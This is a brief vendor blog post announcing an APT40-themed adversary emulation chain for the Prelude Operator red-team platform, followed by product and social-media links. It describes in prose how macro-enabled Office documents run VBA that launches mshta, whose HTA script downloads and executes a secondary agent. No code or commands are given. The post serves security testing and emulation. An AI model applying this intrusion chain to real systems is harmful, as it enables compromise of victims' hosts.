APT40 targets defense industry with multi-stage macro-enabled documents

For this week's TTP Tuesday we are releasing a new APT40 themed chain based on multi-stage macro-enabled Office documents. These documents use LOLBins (living-off-the-land binaries) to download and execute secondary malware. CISA released multiple advisories on APT40 targeting the defense industry in 2017.

This chain chain stages and executes Office documents that contain VBA scripts to run MShta. The HTA file include a script to download and execute a secondary Pneuma agent on the compromised host. To get started, configure your range with the required Operator network facts such as public IP and agent port.

There are several ways to follow us and learn more about Prelude and our team members:

GET OUR PRODUCTS
Download Prelude Operator: www.prelude.org/download/current
See the latest kill chain and TTP Releases: chains.prelude.org/
See our open-source repositories: github.com/preludeorg

JOIN OUR COMMUNITY
Discord: discord.gg/gzUv4XNquu
Reddit: www.reddit.com/r/preludeorg/
Twitter: twitter.com/preludeorg

READ, WATCH, AND LISTEN
Listen to our Podcast: anchor.fm/preludeorg
Read our blog: feed.prelude.org/
Watch our live streams: www.twitch.tv/preludeorg
Watch our pre-recorded content: youtube.com/c/preludeorg

FOLLOW OUR TEAM
David: twitter.com/privateducky
Alex: twitter.com/khyberspache
Kris: twitter.com/Xanthonus
Octavia: twitter.com/VV_X_7
Sam: twitter.com/wasupwithuman